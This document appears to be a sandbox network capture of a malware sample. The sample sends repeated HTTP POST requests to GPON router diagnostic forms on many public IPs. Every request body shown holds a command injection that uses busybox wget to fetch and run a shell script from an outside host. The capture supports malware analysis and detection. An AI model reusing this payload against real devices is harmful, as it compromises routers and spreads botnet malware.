                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1700192.168.2.1357208212.251.245.162443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.815722942 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1701192.168.2.13370865.227.1.13443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.815752029 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1702192.168.2.1360532212.47.230.255443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.815777063 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1703192.168.2.133624842.109.224.11443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.815783024 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1704192.168.2.135507242.104.128.195443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.815814018 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1705192.168.2.1345488109.143.23.89443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.815817118 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1706192.168.2.13517625.191.58.138443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.815900087 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1707192.168.2.13362565.227.51.226443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.815923929 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1708192.168.2.1334634109.49.134.26443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.815933943 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1709192.168.2.1341526118.45.9.56443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.815987110 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1710192.168.2.1350300118.51.211.165443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.816015959 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1711192.168.2.1333364118.105.247.193443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.816019058 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1712192.168.2.135238642.203.6.53443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.816035986 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1713192.168.2.1359094109.219.162.89443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.816050053 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1714192.168.2.133826042.234.255.78443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.816082001 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1715192.168.2.134760042.186.170.164443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.816138029 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1716192.168.2.1355284109.171.236.46443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.816145897 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1717192.168.2.13454265.10.21.110443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.816184044 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1718192.168.2.13529365.254.225.57443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.816463947 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1719192.168.2.1346486109.75.85.158443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.816469908 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1720192.168.2.1356764118.122.86.71443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.816498041 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1721192.168.2.13476265.246.186.164443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.816508055 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1722192.168.2.1353682118.115.38.7443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:33.816538095 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
